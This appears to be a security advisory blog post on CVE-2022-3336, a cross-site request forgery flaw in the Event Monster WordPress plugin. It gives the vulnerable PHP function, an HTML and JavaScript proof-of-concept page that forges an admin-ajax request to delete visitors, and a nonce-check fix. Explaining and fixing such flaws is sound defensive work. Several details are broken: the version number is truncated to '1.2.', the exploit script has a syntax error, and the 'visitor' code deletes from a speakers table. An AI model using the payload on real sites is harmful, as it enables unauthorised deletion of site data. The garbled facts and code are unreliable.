In recent research, we discovered a security vulnerability in the popular Event Monster WordPress plugin (versions before 1.2.) that could allow an attacker to perform a cross-site request forgery (CSRF) attack. This vulnerability exposes your website to risks, as it allows malicious actors to delete arbitrary visitors without proper authorization and by utilizing CSRF attacks. This article will provide detailed information on this critical issue, including code snippets, links to original references, and exploit details.
It is highly advised that users of the Event Monster WordPress plugin update to the latest version (1.2.) to protect their websites from potential attacks.
Overview of the Vulnerability (CVE-2022-3336)
CSRF is a type of malicious exploit that tricks a user into performing unwanted actions on a website they're currently authenticated on. In this particular case, the vulnerability exists because the Event Monster plugin lacks CSRF checks when deleting visitors. As a result, an attacker can craft a phishing attack that would cause a logged-in admin to unknowingly delete arbitrary visitors from the website.
Technical Details and Code Snippet
The deletion of visitors in the Event Monster plugin takes place in the delete_visitor function within the event-monster.php file. The problem with this function is that it lacks any CSRF checks, meaning that any request made to this function will successfully delete the specified visitor without verifying the legitimacy of the request.
Here is the faulty code snippet
function delete_visitor() {
global $wpdb;
if(current_user_can('administrator')){
$id = $_REQUEST['id'];
$table_name = $wpdb->prefix . "em_speakers";
$wpdb->delete( $table_name, array( 'ID' => $id ) );
}
die();
}
add_action( 'wp_ajax_delete_visitor', 'delete_visitor' );
As demonstrated in the code snippet, there's no usage of a CSRF token (nonce) to verify the authenticity of the request, and this creates the security vulnerability.
Exploit Details
To exploit this vulnerability, an attacker could create a malicious webpage that, when visited by a logged-in WordPress admin, sends a forged request to the victim's website that would abuse the delete_visitor function without their knowledge. Such a webpage may look like this:
<html>
<body>
<script>
function performCSRFAttack() {
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://www.example.com/wp-admin/admin-ajax.php?action=delete_visitor&id=TARGET_VISITOR_ID";, true);
xhr.send();
}
performCSRFAttack();
</script>
</body>
</html>
If the attacker successfully tricks the admin into visiting the malicious webpage, the forgery request would execute the delete_visitor function and delete the visitor with the specified TARGET_VISITOR_ID without any user interaction.
Mitigation
To fix this vulnerability, the first step is to update your Event Monster plugin to its latest version - v1.2.. This version adds the necessary CSRF protection when deleting visitors.
A more specific code-level solution would be to add a nonce verification in the delete_visitor function, as shown below:
function delete_visitor() {
global $wpdb;
// Verify nonce
if (!isset($_REQUEST['_wpnonce']) || !wp_verify_nonce($_REQUEST['_wpnonce'], 'delete_visitor_nonce')) {
die('Invalid nonce');
}
if(current_user_can('administrator')){
$id = $_REQUEST['id'];
$table_name = $wpdb->prefix . "em_speakers";
$wpdb->delete( $table_name, array( 'ID' => $id ) );
}
die();
}
add_action( 'wp_ajax_delete_visitor', 'delete_visitor' );
This added nonce verification ensures that any deletion request must come from a valid source, eliminating the CSRF vulnerability.
Conclusion
We have provided a comprehensive overview of the Event Monster WordPress plugin vulnerability (CVE-2022-3336) that allows attackers to delete arbitrary visitors via CSRF attacks. We recommend updating your plugin to the latest version (1.2.) to protect your WordPress website from potential attacks. Ensure that your plugins and themes are regularly updated to maintain a secure website environment.
Timeline
Published on: 11/21/2022 11:15:00 UTC
Last modified on: 11/23/2022 15:50:00 UTC